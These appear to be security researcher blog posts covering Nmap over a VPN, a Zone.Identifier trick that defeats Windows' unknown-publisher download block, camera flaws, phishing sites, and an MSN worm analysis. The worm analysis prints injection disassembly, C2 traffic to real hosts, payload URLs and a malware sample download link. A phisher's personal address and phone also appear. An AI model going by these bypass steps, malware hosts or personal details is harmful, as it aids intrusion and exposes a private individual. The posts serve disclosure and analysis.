Posts byRafel Ivgi

Addicted to computer security :)

Using Nmap Remotely Through F5 FirePass VPN

Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.
I was connected to a network remotely through the company’s F5 VPN appliance and I wanted to scan the internal network.

It looked like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed “Enter” I got:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won’t work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the — unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting ‘/dev/lo0: No such file or directory’ or ‘lo0: No DLPI device found’, complain to Sun. I don’t think Solar is can support advanced localhost scans. You can probably use “-PN -sT localhost” though.

QUITTING!

Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played “Imaginary Linux on Windows” and added the option “-e eth0” which specifies using the Ethernet device indexed at 0 and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time
Interesting ports on XXXXX (192.168.0.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

Bypassing Windows Unknown Publisher Verification For Web Downloaded Executables

I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said “Honey, I am at the office, I have absolutely nothing to do and I can’t connect from here to our computer at home to continue my project”. I said, O.K, let’s see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.

Me: “Honey, go to http://www.teamviewer.com, can you download it?”
Her: “yes, but when I run the setup.exe it says something weired like ‘windows has blocked this software because it can’t verify the publisher’ and it won’t let me install”


Me: “O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ‘:Zone.Identifier’ just before the last quotes. What do you see?”
Her: “I see something like ZoneId=3, now what?”
Me: “I can’t talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye”

After 10 minutes I get an SMS “thanks honey it worked!!!”.
Well we found a bug, I wouldn’t really call it a “Privilege Escalation” but I guess you don’t have to be a hacker to bypass windows security restrictions :)

Exploiting WebView through Internet Explorer to remotely discover windows directory

As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.

In Windows 98 a new look was introduced called “WebView” which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML Templates had the extension “htt”. In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the “htt” files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives until today deeply inside Windows XP’s code in two modules inside the system32 folder:

Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering & Rendering used Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\BACKGROUNDIMAGE
Default = “%SystemRoot%\Web\wvleft.bmp”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\LOGOLINE
Default = “%SystemRoot%\Web\wvline.gif”

Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system’s path.
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:

In Windows XP the variables “%THISDIRPATH%” and “%THISDIRNAME%” were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.

The Proof Of Concept code (Remote WebView Macro Translation):
Save on a remote host with an htt extension and replace “http:///filter_trap.htt

Microsoft was notified a few months ago, the problem will be fixed.

Security Cameras – To See Or Not To See?!

These days, security is going digital.
From live and automatic event log analysis up to personal “on-key” tokens and remotely controlled security cameras.
These technologies should be used carefully. For example if the token generates 6 digits and there is no password complexity enforcement, users can set their password to “1” and then we’ll get a 7 character length password. If the data from the log will not be filtered and will be in html format, it may execute code. Even worse, if it is viewed at the command line console, it may execute code using the console color control characters.
When talking about security cameras, a security flaw in the camera’s simple application server may cause the entire video stream to be accessible to an intruder.

While consulting to a big financial customer, I discovered the security cameras installed are easily accessible to anyone thanks to a very simple logical flaw. Not to mention default user accounts, empty password sets, the ability to brute force, directory traversal and some classic authorization bypass vulnerabilities.

Most of the security cameras in my country are bought from Korea, some of the software is written by the vendor and some by the distributer. Both of them should pay much more attention to security so we won’t have the same classic vulnerabilities over and over again.
Attached are a few screen captures:
another white night at work
another white night at work
Clothing Shop
Clothing Shop
Coffee Shop
Coffee Shop
Eyes on the ball!!!
Eyes on the ball!!!
How's that shirt?
How’s that shirt?”
Anyone knows a Safe-Cracker?!
Anyone knows a Safe-Cracker?!

ICQ Phishing – You Type, They Sell

My friend ax1les has a 5 digit ICQ number and he always gets wiered messages that turn out to be phishing or links to trojans. A few days ago, he got this message:

He thought it would be a good idea that we’ll take a look at that website together, and we did :)

In the last decade russians really mad fun of the world using the Internet.
The website http://icq-confirm.info/ is a phishing website that “confirms” your ICQ account credentials are still valid (yeah right). The amazing thing is he didn’t even bother changing the title from the former text “icq.com” :)

But of course his business is really successful as he is also the owner of the mega-icq-shop, he is trying to hide so much that he event left it in the domain’s whois details……

Domain ID:D28335226-LRMS
Domain Name:ICQ-CONFIRM.INFO
Created On:20-Apr-2009 07:27:17 UTC
Last Updated On:29-Apr-2009 15:01:04 UTC
Expiration Date:20-Apr-2010 07:27:17 UTC
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. d/b/a PublicDomainRegistry.com (R159-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:DI_9732581
Registrant Name:Andrey Petrovich
Registrant Organization:Private person
Registrant Street1:Krasnoarmeyskaya 18 dom 4 kv 32
Registrant Street2:
Registrant Street3:
Registrant City:Moskva
Registrant State/Province:Moskva
Registrant Postal Code:132132
Registrant Country:RU
Registrant Phone:+7.4951783223
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:mega-icq-shop@mail.ru
Admin ID:DI_9732581
Admin Name:Andrey Petrovich
Admin Organization:Private person
Admin Street1:Krasnoarmeyskaya 18 dom 4 kv 32
Admin Street2:
Admin Street3:
Admin City:Moskva
Admin State/Province:Moskva
Admin Postal Code:132132
Admin Country:RU
Admin Phone:+7.4951783223
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:mega-icq-shop@mail.ru
Billing ID:DI_9732581
Billing Name:Andrey Petrovich
Billing Organization:Private person
Billing Street1:Krasnoarmeyskaya 18 dom 4 kv 32
Billing Street2:
Billing Street3:
Billing City:Moskva
Billing State/Province:Moskva
Billing Postal Code:132132
Billing Country:RU
Billing Phone:+7.4951783223
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:mega-icq-shop@mail.ru
Tech ID:DI_9732581
Tech Name:Andrey Petrovich
Tech Organization:Private person
Tech Street1:Krasnoarmeyskaya 18 dom 4 kv 32
Tech Street2:
Tech Street3:
Tech City:Moskva
Tech State/Province:Moskva
Tech Postal Code:132132
Tech Country:RU
Tech Phone:+7.4951783223
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:mega-icq-shop@mail.ru
Name Server:NS1.AGHOST.RU
Name Server:NS2.AGHOST.RU

Anyway, the really wiered thing about this case is that while i am writing this post this website is not loading anymore…the DNS no longer resolves to any IP and their former IP 95.211.7.5 reponse with “Apache is working properley” when requesting the Host “icq-confirm.info”.
May be I scared them away with a few little DNS requests or the cops just randomly knocked on their door :)  

The “DesktopSmiley, Not A Spyware” ToolBar

The “Not A Phishing Worm” really got me interested as it sent special Christmas messages so I decided to dig in just a bit. So as discovered, after the user supplies his MSN credentials, his friends get a link to the “Not A Phishing” website and a lot of tricky links leading to DesktopSmiley.com to download their toolbar. Which they say is “Not Spyware”.

So we got a non-phishing worm downloading a non-spyware program, let’s see its non-evil actions :)
The first thing I did was downloading the installer, which asks no questions and shows no EULA. It is also digitally signed by “DoubleD Advertising Limited”, well that’s really funny, we have got to give them that :)

So I ran it in a VM:

That is quite original! “A non-virtualized hardware system is required”, of course anybody technical gets how lame this lie is :)
why would an IE toolbar “require” a “non-virtualized hardware”, why would it even bother to check if it’s running under a virtualized environment unless it has some illegal actions to hide?!

Well i am defiantly not going to execute it on my machine :)
Maby i will test is some other day on a real machine with Restore-IT/Ghost

In the meantime, let’s take look at some of the things that it does:
It copies some IE settings from HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ to HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ except for (AutoDetect and UNCAsIntranet which exist there and get modified):
ProxyBypass:1 (default 1)
IntranetName:1 (default 1)
MigrateProxy:1 (default 1)
AutoDetect:1 (default 0)
UNCAsIntranet:1 (default 0)
ProxyEnable:0 (default 0)

It sure looks like someone is going to assign a proxy for us :)

The setup process command-line:
“C:\Documents and Settings\Insider\Local Settings\Temporary Internet Files\{5617ECA9-488D-4BA2-8562-9710B9AB78D2}\stbup.exe” /new /src=user

the “/src=user” really sounds like there are cases which the user did not initiated the installation :) it could be used for self-update though.

Lets examine some of the the strings in the memory of this “DoubleD” software:
Software\SimonTatham\PuTTY\Sessions
Software\SimonTatham\PuTTY\SshHostKeys
Software\SimonTatham\PuTTY
\PUTTY.RND
Well, i don’t want to point a blaming finger but it seems this “legitimate smiley IE toolbar” is very interested in getting some access to our saved PuTTY SSH hosts…quite innocent

There are a lot of weird stuff this spyware does, like starting a local proxy which explains how they steal data from IE and makes this self-updating software a cool way to make a non-botnet botnet :)
It also implements an SSH client and almost every famous encryption algorithm (rinjdeal, AES, des, 3des, blowfish) looks like it does local MITM attacks to SSH login software.

So get root and Smile away with it :)

The MSN “Not A Phishing Worm”

This is a funny one actually :)
I am just working as usual when I got the following message on my MSN Messenger:

This is how real girls party. Great high quality pictures on
http://jusmineza.PartyPicturez.info

Now of course i understood that it’s a worm, but still, lets see where it leads to.
So I went into the site and it looked like this:

With what i have seen until now, this is a classic phising site, I saw dozens
like it for Yahoo! in the past. But wait! lets look at that GREY text blow:

Terms of Use / Privacy Policy:

By filling out this form, you authorize T P Ltd to spread the word about this new 100% real and upcoming Messenger Community Site. You will receive your share of the credit in helping us spread the word. This is a harmless Community site which is offering users a platform to meet each other for free.

We do not share your private information with any third parties. By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us. This is not a “phishing” site that attempts to “trick” you into revealing personal information. Everything we do with your information is disclosed here. If you are under eighteen (18), you MUST obtain permission from a parent or guardian before using our website/service.

This page is not affiliated with or operated by Microsoft(tm) or MSN Network(tm).

ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED OR ALLEGEDLY CAUSED BY ANY FAILURE OF PERFORMANCE, ERROR, OMISSION, INTERRUPTION, DEFECT, DELAY IN OPERATION OR TRANSMISSION, COMMUNICATIONS LINE FAILURE, SHALL BE STRICTLY LIMITED TO THE AMOUNT PAID BY OR ON BEHALF OF THE SUBSCRIBER TO THIS SERVICE.

We may temporarily access your MSN account to do a combination of the following: 1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

This is a free service. You will not be asked to pay at any time. You will not be subscribed to anything asking for payment. This service is made possible by many hours of human effort.

T P Ltd reserves the right to change the terms of use / privacy policy at any time without notice. To view the latest version of this privacy policy, simply bookmark this page for future reference.

You understand that this agreement shall prevail if there is any conflict between this agreement and the terms of use you accepted when you signed up with MSN. You also understand that by temporarily accessing your msn account, T P Ltd is NOT agreeing to MSN’s terms of use and therefore not bound by them.

This agreement shall be construed and governed by the law of the republic of Panama. You expressly consent to the exclusive venue and personal jurisdiction of the courts located in the Republic of panama for any actions arising from or relating to this agreement.

If any provision of this agreement is held to be invalid, illegal or unenforceable for any reason, such invalidity, illegality or unenforceability shall not effect any other provisions of this agreement, and this agreement shall be construed as if such invalid, illegal or unenforceable provision had not been contained herein.

Copyright 2008 T P Ltd

OK, they said in the text:

This is not a “phishing” site that attempts to “trick” you into revealing personal information.

So they don’t want our usernames and password, which is also the EMAIL of most people, yeah I believe them, sure.

They just want to:

1. Send Instant Messages to your friends promoting this site. 2. Introduce new entertaining sites to your friends via Instant Messages.

Which is completely different with what a worm does. A worm just spreads and “introduces”, “entertaining” sites with a lot of porn and exploits.

By using our service/website you hereby fully authorize T P Ltd to send messages of a commercial nature via Instant Messages and E-Mails on behalf of third parties via the information you provide us.
…..
ANY LIABILITY, INCLUDING WITHOUT LIMITATION ANY LIABILITY FOR DAMAGES CAUSED

Yeah why not, take my account and send spam “on behalf of third parties” and if they get like hacked or something, we are not responsible, you agreed to this.

I believe this should be called “Legal Phishing User Agreement” or “Worm As A Service”.
It is also a little wiered that a “legal” domain called “partypicturez.info” is dealing with MSN accounts and not PICTURES FROM PARTIES and has unlimited(*.) subdomains and only 1 page, don’t you think?!
Ofcourse they used the domain protection:

Registrant Email:9648af2d68114548bfc703cca6806a46.protect@whoisguard.com
Admin Name:WhoisGuard Protected
Admin Organization:WhoisGuard

Well, don’t fill any form you see without reading the small (and in this case GREY) prints :)

Update:
The same worm also sends this message:

“[msn_dst_user], claim your Prize!
http://
[msn_src_user].win-win-it.com/winner.php”

Any file or subdomain in win-win-it.com redirects to http://www.desktopsmiley.com/go.do?a=814

Which is also registered by WHOISGuard.
Both these websites were built to make people download this:
http://www.desktopsmiley.com/toolbar/desktopsmiley/download/stb_installer.exe

Which they claim is:

“Download DesktopSmiley to get 1000’s of FREE Smileys!
It’s totally FREE! No Registration. No Spyware.”

Yes, a toolbar advertised by a WORM is not spyware, sure…
The example above was version 2.0c. It seems these guys used different methods and different domains and different company names in the older versions (which is typical to viruses and spyware but not to legitimate software).
The following example belongs to an older version 1.1c whi MSN message:

foto http://hi5.eu.com/id.php?=[dst_user_email]

Which prompts a download for “IMG455.jpg-www.photo.com” which is an EXE file with a COM extension and where ran “True Type Detection” will be made by windows loader and it will execute as the regular EXE file it is.
Those people don’t care a bit and they left “Directory Browsing” open in the subdomain’s root, check it out at: http://hi5.eu.com/
They even forgot to remove their private packer from the site: http://hi5.eu.com/pa-packer.rar

They also have a version at: http://new.upicx.com/ (which i think just went down…)
Which loads ” http://new.upicx.com/indexx.php” and ” http://new.upicx.com/pop.php” and VERIFYS the request’s REFERER is ” http://new.upicx.com/” so direct reference to these files returns “404 Not Found”.

A new MSN Worm

Are viruses attracted to me specifically or it happens to everyone and they just don’t notice or say nothing about it. It getting really hard to speak with people using instant messengers and to be sure it is them sending you a message and not a virus.

Before i begin, let’s notice a few close viruses :)
This: http://www.cisrt.org/enblog/read.php?106
Is a different one, older one from July. Reported and still not fully detected by vendors.

Now for the painful part, this:
http://blog.threatfire.com/2008/06/msn-im-worm.html
a little older variant that was covered in June!!! that is 5 month ago!! the detection rates were nasty, they still are as you will see afterwards…
The point I don’t get is why don’t AV vendors take care of the missed detections at least AFTER some security researcher publishes an analysis?!

I got a message from a friend who is currently having a trip in thailand and i was amazed to see that his computer sent me a message with a link with my msn email in it. I clicked the link and here a file download prompt pops up and the file name is: “virus-PIC006.JPG-www.myspace.exe”.
Well, as tired as i may be, i would never be THAT tired to execute it :)

So i saved it and started to analyze!
Well what is it? it is a self extracting cab archive(almost original :) with resource details spoofed to be a microsoft file! (it even looks like it was edited manually using a tool such as Resource Hacker)
File Version: “6.0.2900.2180”
Description: “Win32 Cabinet Self-Extractor ” (may be they thought we won’t notice the spaces :)
Company: “Microsoft Corporation”
File Version: “6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)”
Internal Name: “Wextract ”
Language: “English (United States)”
Original File name: “WEXTRACT.EXE ”
Product Name: “Microsoft® Windows® Operating System”
Product Version: “6.00.2900.2180”

Well again it seems that Winrar is more effective than an Anti-Virus, where it detects it as a self-extracting archive so i know it’s no simple exe:

The funniest think about this “trap file” is that it has double extension of .jpg………..exe that comes with the default icon of a jpeg file

BUT when you switch to DETAILS view in the browser, then you see its 16×16 icon which is a setup icon:

Dear bad guys! use some of that money you steal to do some Q&A for your bot droppers!
O.K let’s see if our friends know it:

9 of 36…wow!
Could it be that Symantec, Mcafee, Kaspersky, F-Secure, Panda, Sophos all the great brands does not even suspect it?! and that Microsoft which is quite new in the AV business catches it?! I want to point out Dr. Web again for being a good detector(comparing to the concept of an Anti-Something) as Kaspersky once were, before they went to enterprise and from tech to GUI (if i was kaspersky, i would by dr web…just a thought)

So we extract the sfx and we get a file called test.exe with a jpg icon, this time it’s not an archive, here comes the real shame, it is not even packed!!!
Let’s see if our friends know it:

it is just a simple VC++ executable that uses dynamic function calls with the simplest use of a rolling xor running on the string “somenigz’, quite amusing :)

.text:0040122E mov [ebp+var_340], 0
.text:00401238 push offset Source ; “¦âöÉàöíâPÆöé馔
.text:0040123D call sub_401000
.text:00401242 add esp, 4
.text:00401245 push eax ; lpProcName
.text:00401246 push offset aFgqfaXaa ; “Üöâƒö¥-+¯ò¥¥”
.text:0040124B call sub_401000
.text:00401250 add esp, 4
.text:00401253 push eax ; lpModuleName
.text:00401254 call ds:GetModuleHandleA
.text:0040125A push eax ; hModule
.text:0040125B call ds:GetProcAddress

You can see these letters “Üöâƒö¥-+¯ò¥¥” which are clearly XORed sent to a function, the classic “decrypt my dll name and then the function in it and call it”. Of course “sub_401000” is the decrypt function:

.text:0040105D Rolling_Xor_Loop: ; CODE XREF: sub_401000+85j
.text:0040105D mov edx, [ebp+var_C]
.text:00401060 add edx, 1
.text:00401063 mov [ebp+var_C], edx
.text:00401066
.text:00401066 loc_401066: ; CODE XREF: sub_401000+5Bj
.text:00401066 cmp [ebp+var_C], 9
.text:0040106A jnb short loc_401087
.text:0040106C mov eax, [ebp+Str]
.text:0040106F add eax, [ebp+var_8]
.text:00401072 mov ecx, [ebp+var_C]
.text:00401075 mov dl, [eax]
.text:00401077 xor dl, byte ptr aSomenigz[ecx] ; “somenigz”
.text:0040107D mov eax, [ebp+Str]
.text:00401080 add eax, [ebp+var_8]
.text:00401083 mov [eax], dl
.text:00401085 jmp short Rolling_Xor_Loop

Decoded XORed strings, by order, are:
CreateProcessA
kernel32.dll
NtUnmapViewOfSection
ntdll.dll
VirtualAllocEx
kernel32.dll
WriteProcessMemory
kernel32.dll
GetThreadContext
kernel32.dll
SetThreadContext
kernel32.dll
ResumeThread

This shows us this was not written by simple kids! this is a professional code injection using thread contexts, this teaches us that the guys “on the wild” have learned beyond besides CreateRemoteThread!!!

It seems that this version relates to: burimilol.com which is unknown to “norton safe web” (yeah right): https://safeweb.norton.com/report/show?name=burimilol.com but it’s older variant is known “burimilol.net”: https://safeweb.norton.com/report/show?name=burimilol.net
What separates us from the criminals is the “protected domain services” which is mostly used by criminals…again no internet cops :)

Now it executes itself! parses its duplicate’s PE and sections and injects code into it!
Then it dumps a hidden exe in %windir%(c:\windows) called fxstaller.exe(48kb) which this time has a jpg icon in both the 32×32 and the 16×16 :)

This exe drops/downloads image.exe(48kb) in a new temp folder in %temp%

This results are crippy!!! i guess Dr.Web also failed and there is no one left to trust but Microsoft!
Then service.exe(144kb) is dropped at %windir$\system32\service.exe, a hidden file with a darth vader icon :)

This exe of darkness downloads and executes a file to c:\msn.exe

Now some deeper information, for the researchers among us. Why their url is not blocked?! because they are tricky!!!
They “try” do download http://www.freewebtown.com/tatrusa/test2.jpg which redirects to
http://fwt.txdnl.com/6-40/t/a/tatrusa/test2.jpg
Then it requests
GET /cn?sid=40545F5A4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F5C2B282F2D5A5C5A2D5E2C5D5A5B282B2B5E582C5F5151592D2C515D2A5A5A4F081D544F131854594F1D1954594F080F0F000D54585F515D51504F04061B1901000D5408075B0E4F1B0C1F000D54505C505B692901 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 85.17.166.233

And gets

HTTP/1.1 200 OK
Date: Thu, 13 Nov 2008 00:04:56 GMT
Server: Apache/2.0.61 (FreeBSD) PHP/5.2.3 with Suhosin-Patch mod_fastcgi/2.4.2
Set-Cookie: sid=EE1DDFD5947B45F595556BD6D7E9C1A7; expires=Sat, 07-Nov-2009 19:04:56 GMT

g_InstallDll: http://77.93.75.153/img/upd.dll
Content-Length: 127
Connection: close
Content-Type: text/html

34034a4615431643424540474651151e4a4640445116034a354344403134363435464641464633333543454346414f434f4e3431313131315104114a047743

Then it sends stuff about me, to get the commands for this cool trojan!

POST / HTTP/1.1
g_Version: 1156
g_ClientGUID: ,Xc,q!!q-Kk!JcXX-yK9NNGqKNk=!!
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_SetID: [QJx
g_AffiliateID: y9NkNh
g_ResourceID: MnOM
g_URL: 8

g_Client: .Sf”yhJ:y9N:y!y:9 %?[H[Q]F:FBxFf@8/FQ":y:J9GGg)O?BFVO S[VE Ji8.K”-:G:-!G:y!8vR"^yJG8Z}V"|OW?Om8*) uOxFfUO?On U}" =?}m8rc="GG^G!^aa^NG^9^Gk8*K [VV}]QUf”0S*S!p[IO”f[n[f)rvSp[IO”f[n[fb8 =?}m86Wn”GGGGGkGh>#GGGGGkGq8p]IWO? }a H?}VOff}?f” y8.f_fO?cnIFQ” 1Of8o)]VV=}QQ”QOBO?o=}QQ”QOBO?o=}QQp]I”Go,FAO” =”z/.pq*/)zf~fUOI!JzQQQAPFF.:nAAo.QF fFMO” !kkoqOaX?}mfO?”D=”zS?}x?[I ,FAOfz.QUO?QOU KYHA}?O?z.KeSZ*uK:KeKD ^Q}’}IOoqOfEU}H)~fUOI”qOfEU}Ho
g_GZipSupported: U?]O
g_RevID: h9J-
g_First: y
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: bescoro.com
Content-Length: 37
Cache-Control: no-cache

)vcv.)v.=) 0%nDDn@%r}MFAA[|FfU}?~” @b

And gets:
HTTP/1.1 200 Ok
Server: nginx/0.5.35
Date: Thu, 13 Nov 2008 00:05:26 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: close
Pragma: No-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 219
Content-Language: en
Set-Cookie: uid=Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: guid=,Xc,q!!q-Kk!JcXX-yK9NNGqKNk=!!; expires=Mon, 09-Dec-2007 13:46:00 GMT
Set-Cookie: cn=y; expires=Mon, 09-Dec-2007 13:46:00 GMT
Location:
Test: [B[FA
g_AdCategory: )}IO
g_ConnectionPerDay: k
g_MaxCategoryAppearances:
g_Popup: U?]O
g_PopupPerDay: yGy
g_RSD: ‘UUH”88}WFOWO:V}I8x}88o’UUH”88nO?}]fUF:V}I8x}88o
g_RedirectServers: ‘UUH”88NJ:hN:J!:!8x}88o’UUH”88N:y-:y99:y-G8x}88o'UUH"88N!:ykh:yy:ykN8x}88o
g_RevFlag: G
g_ServerIPs: gWOfV}?}:V}I”NGigNh:yNN:y9:!9″NGigN!:ykh:yy:yk-"NGi
g_SetIDWas: _Q?OAO[fOn
g_StatisticsUploadDelay: y
g_StealFocus: a[AfO
g_UID: Xk!-,=c=Xyy9yyqqXkJky9NkNh=,,,,,
g_URL: 8

Y.r.r..G.....=......Q..|$u..kM.+…….u..-.L..7…7{G.
.w.=.(r…%…….u……..NsGD.a.2…g.d….I.6..:T………….R.L_……$6.G…….RZeZ>
+=/~..`Y. ……..B……..X
..’.a.b..7…O>n.i..Y.._9_%.
…qre../.p.

Then it “trys” to download http://www.freewebtown.com/tatrusa/oos.jpg and again redirected to: http://fwt.txdnl.com/6-40/t/a/tatrusa/oos.jpg
Then it downloads http://www.j2arts.com/images/msn.exe to c:\msn.exe
From here it looks like it is the same old tech viruses (keyloggers and the classics, i don’t have time for these files…..):
rundll32.exe C:\WINDOWS\system32\vtUolLBS.dll,a (vtUolLBS…. == random name)
rundll32.exe C:\WINDOWS\system32\nnnljiiI.dll,c
rundll32.exe C:\WINDOWS\system32\iifgHbyY.dll,a

So let’s summarize!

Evil hosts:
burimilol.net
burimilol.com
www.j2arts.com
www.freewebtown.com
fwt.txdnl.com
bescoro.com
77.93.75.153
85.17.166.233

The AV vendors should receive my scanned files from virustotal.
I will also make an exception on this one and upload a sample for all the involved executable!
http://www.linkstofiles.com/MSNWorm.rar
archive password: “virus”

Stop them, sue them, black list them, hack them, they are stealing from all of us!
Fight for digital law enforcement!!!